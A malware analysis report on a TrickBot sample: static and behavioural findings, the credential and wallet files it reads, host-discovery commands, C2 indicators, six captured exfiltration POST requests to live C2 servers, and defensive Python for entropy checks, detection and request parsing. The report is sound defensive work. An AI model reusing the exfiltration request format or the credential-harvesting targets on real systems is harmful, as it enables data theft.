Malware Analysis: TrickBot

Jul 30, 2020 • malware_analysis

Disclaimer

The following is a malware analysis report for the binary with SHA-256 hash 91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3.
The binary can be downloaded from MalwareBazaar.
I take no responsibility for any actions you take based on this report.
Use caution when downloading and executing malware.
Use a virtual machine, be safe, have fun.

Opinions

TrickBot's main goal, being a banking trojan at heart, is to steal credit card and bank account information.
That alone has evidently not been lucrative enough for the operators, so more and more kinds of data are being searched for and the use of second-stage payloads has increased.

This sample only ran for 15-20 minutes. In a typical TrickBot infection the malware keeps beaconing out indefinitely.
It is not uncommon to see a second-stage payload pushed to beaconing victims days after the initial infection.
That second stage is usually more persistent and is typically either a ransomware variant or a cryptocurrency miner.

TrickBot, like other popular trojans, will continue to evolve.
Anti-analysis techniques will be added. Capabilities will be added.
Whether it's stealing financial or personal data or delivering ransomware, as long as there is a way to profit from it, it will continue to be used.

Analysis Summary

When executed, this malware spawns a second instance of itself.
The new process then injects malicious code into the legitimate Windows process wermgr.exe.
wermgr.exe in turn launches svchost.exe, which runs the host-discovery commands.

The discovery seen in this sample consists of running ipconfig.exe, net.exe and nltest.exe, plus a GET request to wtfismyip[.]com, which returns the public IP of the host.
Beyond data about the host and network, the malware also searched the host itself for sensitive information:
cryptocurrency wallet data, SSH private keys, VPN credentials and configurations, VNC credentials and configurations, git credentials, and browser history, cache and saved passwords.
The malware then exfiltrates this data over HTTPS in POST requests to several of its C2 servers.
The POST requests carrying browser form data also contain empty billinfo and cardinfo fields, which indicates that billing and credit card information was searched for on the host as well.

As for persistence, nothing of note was done: no registry keys, scheduled tasks or services were created.
Given that the sample only ran for 15-20 minutes, that is a statement about this run, not about what a longer-lived infection or a second-stage payload would do.

Environment and tools


Static Analysis

Field          Value
File size      540724 bytes
Code signing   Unsigned
MD5            5930091b65aed9627dd1a4e86458b72f
SHA1           1e6ee2e805e21c007aa70217856bf31141ccc552
SHA256         91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3
SSDEEP         6144:QXRZwJkHAfrJoz9KnjY/F0eAcLeRpJ0ulEypWu/blRTZSMIbBkfoqpArjO:QXRZmrJoBKIqkapJDmy4uBRTQ4pD
IMPHash        a9daf8a064784a80002aa6baaea5ce3b
Compile time   Wed Jul 22 08:55:12 2020
Packed         No
Compiler       Microsoft Visual Basic 6.0
Linker         Microsoft Linker
Overlay        PDB 2.0 file link
Entropy        6.827

The compile time is eight days before the date of this report. The Visual Basic 6.0 compiler identification matches the import table below, where all but two imports are resolved through the VB6 runtime, MSVBVM60.DLL.

PE Sections

Section  MD5                               Entropy  Size          Entry point  Access
.text    9F4717E23F056519B2BEEB92221702EB  5.838    339968 bytes  0x0000487C   R,X
.data    620F0B67A91F7F74151BC5BE745B7110  0        4096 bytes                 R,W,ID
.rsrc    34DEF4049197F06B4075C6A749B19987  7.895    192512 bytes               R,ID

Although the file is reported as not packed, the .rsrc section has an entropy of 7.895 out of a possible 8 and is the second-largest section in the file. That is consistent with an encrypted or compressed payload stored as a resource and unpacked at runtime, which is also why VirtualAlloc is listed as a breakpoint candidate below.
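The per-section entropy figures in the table can be reproduced without a PE library. The following is an added example, not code from the original report: it parses the PE section table by hand, computes Shannon entropy per section and flags anything close to the 8-bit ceiling. The sample PE built by make_sample_pe() is constructed for the example (a repetitive .text, a zero-filled .data and a random .rsrc standing in for an encrypted resource); it is not the TrickBot binary, and the 7.0 flag threshold is an assumption.

```python
"""Per-section Shannon entropy straight from the PE section table.

Added example, not from the original report: no pefile dependency, the section
table is parsed by hand.  make_sample_pe() constructs a minimal PE for the
example (repetitive .text, zero-filled .data, random .rsrc); it is not the
TrickBot binary, and the 7.0 flag threshold is an assumption.
"""
import math
import os
import struct
from collections import Counter

HIGH_ENTROPY = 7.0  # assumption: near the 8.0 ceiling means encrypted/compressed content


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or single-valued data, close to 8.0 for random bytes."""
    if not data:
        return 0.0
    n = len(data)
    ent = -sum(c / n * math.log2(c / n) for c in Counter(data).values())
    return ent if ent > 0 else 0.0


def pe_sections(blob: bytes):
    """Yield (name, raw_offset, raw_size, characteristics) for each section header."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", blob, coff + 2)[0]
    size_opt = struct.unpack_from("<H", blob, coff + 16)[0]
    table = coff + 20 + size_opt                          # first IMAGE_SECTION_HEADER
    for i in range(num_sections):
        (name, _vsize, _va, raw_size, raw_off,
         _reloc, _lines, _nreloc, _nlines, chars) = struct.unpack_from("<8sIIIIIIHHI", blob, table + 40 * i)
        yield name.rstrip(b"\0").decode("ascii", "replace"), raw_off, raw_size, chars


def section_entropy(blob: bytes):
    """Return [(name, entropy, raw_size, flagged)] for every section in the file."""
    rows = []
    for name, off, size, _chars in pe_sections(blob):
        ent = round(shannon_entropy(blob[off:off + size]), 3)
        rows.append((name, ent, size, ent >= HIGH_ENTROPY))
    return rows


def make_sample_pe() -> bytes:
    """Constructed PE32 with three sections: enough header for pe_sections(), not loadable."""
    sections = [(b".text", bytes(range(16)) * 256),   # 16 symbols, entropy exactly 4.0
                (b".data", b"\0" * 512),               # all zero, entropy 0.0
                (b".rsrc", os.urandom(4096))]         # stands in for an encrypted resource
    size_opt = 0xE0                                    # PE32 optional header size
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x80)).ljust(0x80, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_opt, 0x102)
    opt = struct.pack("<H", 0x10B).ljust(size_opt, b"\0")
    header_len = 0x80 + 4 + 20 + size_opt + 40 * len(sections)
    first_raw = (header_len + 0x1FF) & ~0x1FF          # 512-byte file alignment
    table, body = b"", b""
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), 0,
                             len(data), first_raw + len(body), 0, 0, 0, 0, 0x40000040)
        body += data.ljust((len(data) + 0x1FF) & ~0x1FF, b"\0")
    return (dos + b"PE\0\0" + coff + opt + table).ljust(first_raw, b"\0") + body


if __name__ == "__main__":
    for name, ent, size, flagged in section_entropy(make_sample_pe()):
        print(f"{name:<8}{ent:>7.3f}{size:>8} bytes{'  <-- high entropy' if flagged else ''}")
```

Against the real sample, section_entropy(open(path, "rb").read()) gives the table's figures; the raw-size and raw-offset fields come from the section headers, so an overlay appended after the last section (the "PDB 2.0 file link" noted above) is not part of any row.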

Imports

Library Count
oleaut32.dll 1
kernel32.dll 1
MSVBVM60.DLL 144

Possible Breakpoints

  • VirtualAlloc

Capabilities

Capability Namespace
execute anti-VM instructions (2 matches) anti-analysis/anti-vm/vm-detection
contains PDB path executable/pe/pdb
contain a resource (.rsrc) section executable/pe/section/rsrc
parse PE header (4 matches) load-code/pe

Tactics and Techniques

ATT&CK Tactic ATT&CK Technique
DEFENSE EVASION Virtualization/Sandbox Evasion::System Checks [T1497.001]
EXECUTION Shared Modules [T1129]

OSINT


Behavioral Analysis

Processes

Process              PID   Command line
91beb7c43da3dd….exe  5388  91beb7c43da3dd….exe
91beb7c43da3dd….exe  3128  91beb7c43da3dd….exe
wermgr.exe           2904  wermgr.exe
svchost.exe          5204  svchost.exe
svchost.exe          6944  svchost.exe
ipconfig.exe         6016  ipconfig /all
net.exe              6240  net config workstation
net.exe              6404  net view /all
net.exe              264   net view /all /domain
nltest.exe           6556  nltest /domain_trusts
nltest.exe           3808  nltest /domain_trusts /all_trusts
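The discovery chain in the table is easy to catch in process-creation telemetry because wermgr.exe, the Windows Error Reporting manager, has no business launching svchost.exe, let alone net.exe or nltest.exe. The following is an added example, not part of the original report: it replays constructed Sysmon-style process events that mirror the table (the PIDs are the table's; the parent PIDs, timestamps, the sample.exe stand-in for the hash-named binary and the benign cmd.exe control are assumptions) and alerts when a wermgr.exe lineage runs three or more distinct discovery commands within five minutes. Both thresholds are assumptions.

```python
"""Flag host/domain discovery commands descending from wermgr.exe.

Added example, not from the original report.  Events are constructed to mirror
the process table: PIDs match the table; parent PIDs, timestamps, the
sample.exe stand-in for the hash-named binary and the benign cmd.exe control
are assumptions for the example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery command lines seen in the sample, matched as lowercase prefixes.
DISCOVERY = ("ipconfig /all", "net config workstation", "net view", "nltest /domain_trusts")
ANCHOR = "wermgr.exe"            # process that should never be running these
MIN_DISTINCT = 3                 # assumption: alert on three or more distinct commands...
WINDOW = timedelta(minutes=5)    # assumption: ...within a five-minute window

# Constructed Sysmon-style events: (UtcTime, ProcessId, ParentProcessId, Image, CommandLine)
RAW_EVENTS = [
    ("2020-07-30 10:00:00", 5388, 4000, "sample.exe", "sample.exe"),
    ("2020-07-30 10:00:01", 3128, 5388, "sample.exe", "sample.exe"),
    ("2020-07-30 10:00:02", 2904, 3128, "wermgr.exe", "wermgr.exe"),
    ("2020-07-30 10:00:03", 5204, 2904, "svchost.exe", "svchost.exe"),
    ("2020-07-30 10:00:03", 6944, 2904, "svchost.exe", "svchost.exe"),
    ("2020-07-30 10:00:04", 6016, 5204, "ipconfig.exe", "ipconfig /all"),
    ("2020-07-30 10:00:05", 6240, 5204, "net.exe", "net config workstation"),
    ("2020-07-30 10:00:05", 6404, 6944, "net.exe", "net view /all"),
    ("2020-07-30 10:00:06", 264, 6944, "net.exe", "net view /all /domain"),
    ("2020-07-30 10:00:07", 6556, 5204, "nltest.exe", "nltest /domain_trusts"),
    ("2020-07-30 10:00:08", 3808, 6944, "nltest.exe", "nltest /domain_trusts /all_trusts"),
    # benign control: an admin running ipconfig from a console, no wermgr.exe ancestor
    ("2020-07-30 10:30:00", 7100, 4000, "cmd.exe", "cmd.exe"),
    ("2020-07-30 10:30:05", 7200, 7100, "ipconfig.exe", "ipconfig /all"),
]


def load_events(raw):
    """Turn the raw tuples into dicts with parsed timestamps."""
    return [{"time": datetime.fromisoformat(t), "pid": pid, "ppid": ppid,
             "image": image, "cmdline": cmdline} for t, pid, ppid, image, cmdline in raw]


def discovery_kind(cmdline):
    """Return the matching DISCOVERY prefix, or None if the command line is not one."""
    cl = cmdline.lower().strip()
    return next((d for d in DISCOVERY if cl.startswith(d)), None)


def ancestors(event, by_pid, limit=16):
    """The event followed by its parents, nearest first; stops at an unknown parent."""
    chain = []
    cur = event
    while cur is not None and len(chain) < limit:
        chain.append(cur)
        cur = by_pid.get(cur["ppid"])
    return chain


def detect(events):
    """Alert per wermgr.exe instance whose descendants ran MIN_DISTINCT discovery commands in WINDOW."""
    # Keyed by PID only for the example; on real telemetry key by ProcessGuid, PIDs are reused.
    by_pid = {e["pid"]: e for e in events}
    per_anchor = defaultdict(list)          # wermgr pid -> [(time, kind, child pid)]
    for e in events:
        kind = discovery_kind(e["cmdline"])
        if kind is None:
            continue
        for anc in ancestors(e, by_pid)[1:]:
            if anc["image"].lower() == ANCHOR:
                per_anchor[anc["pid"]].append((e["time"], kind, e["pid"]))
                break
    alerts = []
    for apid, hits in per_anchor.items():
        hits.sort(key=lambda h: h[0])
        for start, _, _ in hits:            # slide the window from each hit
            window = [h for h in hits if start <= h[0] <= start + WINDOW]
            kinds = {h[1] for h in window}
            if len(kinds) >= MIN_DISTINCT:
                alerts.append({
                    "anchor_pid": apid,
                    "lineage": [p["image"] for p in ancestors(by_pid[apid], by_pid)],
                    "kinds": sorted(kinds),
                    "child_pids": sorted(h[2] for h in window),
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in detect(load_events(RAW_EVENTS)):
        print(alert)
```

The lineage in the alert (wermgr.exe under two copies of the sample) is what distinguishes this from an administrator's console session; the benign control event in RAW_EVENTS never reaches an alert because its ancestry contains no wermgr.exe.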

Files Created

C:\Users\REM\AppData\Local\Temp\~DF5E8D1E64DE577706.TMP

Files Accessed

C:\Program Files\UltraVNC\ultravnc.ini
C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini
C:\Program Files (x86)\UltraVNC\ultravnc.ini
C:\Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\History
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\History.bak
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Local State.bak
C:\Users\REM\.config\git\credentials
C:\Users\REM\.git-credentials

Directories Listed

C:\Users\REM\AppData\Roaming\bitcoin
C:\Users\REM\AppData\Roaming\litecoin
C:\Users\REM\.ssh
C:\Users\REM\AppData\Local\Microsoft\Windows\INetCookies
C:\Users\REM\AppData\Local\Microsoft\Windows\INetCache
C:\Users\REM\AppData\Local\Microsoft\Windows\INetCache\Content.IE5
C:\Users\REM\AppData\Local\Microsoft\Windows\INetCache\IE

PCAP

Download

Protocols

Protocol Number of Packets
TCP 1218
SSL 623
HTTP 10

Indicators of Compromise

  • 103.12.161.194
  • 103.111.83.246
  • 82.146.46.209
  • 194.5.249.157
  • 96.9.73.73
  • 203.176.135.102

194.5.249.157 and 96.9.73.73 are the two servers that received the exfiltration POSTs shown below. wtfismyip[.]com, contacted for the public IP check, is a legitimate service and is not listed as an indicator.

Exfiltration

Every request uses TrickBot's C2 URL scheme /<gtag>/<client id>/<command>/: the group tag is tot773, the client ID is built from the hostname (DESKTOP-2C3IQHO), the Windows version (W10016299, i.e. Windows 10 build 16299) and a 32-character hex value, and the last element is the command number. Command 81 reports a credential-theft result as a data/source pair; in all four such requests the data part is empty, so nothing was found for "OpenVPN passwords and configs" or "OpenSSH private keys". Command 83 carries harvested browser form data (formdata) together with billinfo and cardinfo, both of which are the empty placeholder {]}; that is the request which shows the bot looked for billing and card data and found none. Each request was sent to both 194.5.249.157:443 and 96.9.73.73, with a different multipart boundary each time.

Request 1 (command 81, to 194.5.249.157:443):

POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------KNFVSHSAHHJUPYKX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 194.5.249.157:443
Content-Length: 219
Connection: Close
Cache-Control: no-cache

-----------KNFVSHSAHHJUPYKX
Content-Disposition: form-data; name="data"

-----------KNFVSHSAHHJUPYKX
Content-Disposition: form-data; name="source"

OpenVPN passwords and configs
-----------KNFVSHSAHHJUPYKX--

Request 2 (command 83, to 194.5.249.157:443):

POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/83/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------OCPLLBXQPEACMBMT
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 194.5.249.157:443
Content-Length: 473
Connection: Close
Cache-Control: no-cache

-----------OCPLLBXQPEACMBMT
Content-Disposition: form-data; name="formdata"

{"descr":["NordVPN"],"dns1":["103.86.99.100"],"email":["USERNAME"],"q":["microsoft office"],"search":["91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3"],"usernamefld":["admin"]}
-----------OCPLLBXQPEACMBMT
Content-Disposition: form-data; name="billinfo"

{]}
-----------OCPLLBXQPEACMBMT
Content-Disposition: form-data; name="cardinfo"

{]}
-----------OCPLLBXQPEACMBMT--

Request 3 (command 81, to 96.9.73.73):

POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------IMJCMDOMDOMKUGNM
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 96.9.73.73
Content-Length: 219
Connection: Close
Cache-Control: no-cache

-----------IMJCMDOMDOMKUGNM
Content-Disposition: form-data; name="data"

-----------IMJCMDOMDOMKUGNM
Content-Disposition: form-data; name="source"

OpenVPN passwords and configs
-----------IMJCMDOMDOMKUGNM--

Request 4 (command 81, to 194.5.249.157:443):

POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------OTTNHTNLBMUSVCXD
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 194.5.249.157:443
Content-Length: 210
Connection: Close
Cache-Control: no-cache

-----------OTTNHTNLBMUSVCXD
Content-Disposition: form-data; name="data"

-----------OTTNHTNLBMUSVCXD
Content-Disposition: form-data; name="source"

OpenSSH private keys
-----------OTTNHTNLBMUSVCXD--

Request 5 (command 83, to 96.9.73.73):

POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/83/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------QAKGETNFFXRQJOMX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 96.9.73.73
Content-Length: 473
Connection: Close
Cache-Control: no-cache

-----------QAKGETNFFXRQJOMX
Content-Disposition: form-data; name="formdata"

{"descr":["NordVPN"],"dns1":["103.86.99.100"],"email":["USERNAME"],"q":["microsoft office"],"search":["91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3"],"usernamefld":["admin"]}
-----------QAKGETNFFXRQJOMX
Content-Disposition: form-data; name="billinfo"

{]}
-----------QAKGETNFFXRQJOMX
Content-Disposition: form-data; name="cardinfo"

{]}
-----------QAKGETNFFXRQJOMX--

Request 6 (command 81, to 96.9.73.73):

POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------BSBWMEZDSAFVUJLA
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 96.9.73.73
Content-Length: 210
Connection: Close
Cache-Control: no-cache

-----------BSBWMEZDSAFVUJLA
Content-Disposition: form-data; name="data"

-----------BSBWMEZDSAFVUJLA
Content-Disposition: form-data; name="source"

OpenSSH private keys
-----------BSBWMEZDSAFVUJLA--
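Pulling the useful fields out of these requests (C2 path components, multipart parts, JSON form data, and the malformed {]} placeholders) is a small parsing job worth automating over a whole capture. The following is an added example, not code from the original report. build_request() reproduces the on-the-wire format so that two of the captured requests can be embedded with CRLF line endings restored and Content-Length recomputed; the reading of the URL path as group tag / client ID / command follows public TrickBot reporting and is an assumption, not something this capture alone proves.

```python
"""Parse TrickBot exfiltration POSTs of the shape captured above.

Added example, not from the original report.  build_request() reproduces the
on-the-wire format so the two samples below can be embedded from the capture
(CRLF line endings restored, Content-Length recomputed).  The gtag / client ID
/ command reading of the URL path follows public TrickBot reporting and is an
assumption; the field names and values come from the capture itself.
"""
import json
import re

USER_AGENT = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; "
              ".NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; "
              ".NET CLR 3.5.30729)")
CLIENT_ID = "DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36"
# assumed layout: <hostname>_W<major><minor><build>.<32 hex chars>
CLIENT_ID_RE = re.compile(r"^(?P<host>.+)_(?P<os>W\d+)\.(?P<uid>[0-9A-Fa-f]{32})$")


def build_request(host, command, boundary, parts):
    """Assemble one bot request: multipart/form-data body, one part per (name, value)."""
    body = "".join(f"--{boundary}\r\nContent-Disposition: form-data; name=\"{n}\"\r\n\r\n{v}\r\n"
                   for n, v in parts) + f"--{boundary}--\r\n"
    head = ("POST /tot773/{cid}/{cmd}/ HTTP/1.1\r\nAccept: */*\r\n"
            "Content-Type: multipart/form-data; boundary={b}\r\nUser-Agent: {ua}\r\n"
            "Host: {host}\r\nContent-Length: {n}\r\nConnection: Close\r\nCache-Control: no-cache\r\n\r\n")
    return head.format(cid=CLIENT_ID, cmd=command, b=boundary, ua=USER_AGENT,
                       host=host, n=len(body.encode())) + body


def decode_value(value):
    """JSON-decode JSON-looking parts; keep the raw text for invalid JSON such as the bot's '{]}'."""
    if value[:1] in ("{", "["):
        try:
            return json.loads(value)
        except json.JSONDecodeError:
            return value
    return value


def parse_request(raw):
    """Return URL components, Host header and decoded multipart fields of one request."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, val = line.partition(":")
        headers[key.strip().lower()] = val.strip()
    gtag, client_id, command = path.strip("/").split("/")
    m = CLIENT_ID_RE.match(client_id)
    info = {"method": method, "host": headers.get("host"), "gtag": gtag,
            "client_id": client_id, "command": int(command),
            "hostname": m["host"] if m else None, "os_tag": m["os"] if m else None,
            "fields": {}}
    boundary = re.search(r"boundary=([^;\s]+)", headers["content-type"]).group(1)
    for chunk in body.split("--" + boundary)[1:]:
        if chunk.startswith("--"):            # closing delimiter
            break
        part_head, _, value = chunk.strip("\r\n").partition("\r\n\r\n")
        name = re.search(r'name="([^"]*)"', part_head).group(1)
        info["fields"][name] = decode_value(value)
    return info


def describe(info):
    """One-line analyst summary; the 81/83 meanings are what this capture shows, not a spec."""
    f = info["fields"]
    if info["command"] == 81:
        status = "nothing found" if not f.get("data") else f"{len(f['data'])} chars"
        return f"cmd 81 credential result for '{f.get('source')}': {status}"
    if info["command"] == 83:
        form = f.get("formdata") if isinstance(f.get("formdata"), dict) else {}
        card = "present" if isinstance(f.get("cardinfo"), dict) and f["cardinfo"] else "absent"
        return f"cmd 83 browser form data: {len(form)} autofill keys, card data {card}"
    return f"cmd {info['command']}: {sorted(f)}"


# Two of the six captured requests; the others differ only in host, boundary and source string.
SAMPLES = [
    build_request("194.5.249.157:443", 81, "---------KNFVSHSAHHJUPYKX",
                  [("data", ""), ("source", "OpenVPN passwords and configs")]),
    build_request("96.9.73.73", 83, "---------QAKGETNFFXRQJOMX",
                  [("formdata", '{"descr":["NordVPN"],"dns1":["103.86.99.100"],"email":["USERNAME"],'
                                '"q":["microsoft office"],"search":["91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3"],'
                                '"usernamefld":["admin"]}'),
                   ("billinfo", "{]}"), ("cardinfo", "{]}")]),
]

if __name__ == "__main__":
    for raw in SAMPLES:
        r = parse_request(raw)
        print(r["host"], r["gtag"], r["hostname"], r["os_tag"], "->", describe(r))
```

The parser deliberately does not fall over on the {]} placeholders: a strict json.loads would discard exactly the two fields that tell you whether card data was harvested. On a real capture, feed it the reassembled TLS-decrypted request bodies and group results by client ID to see which sources returned data per host.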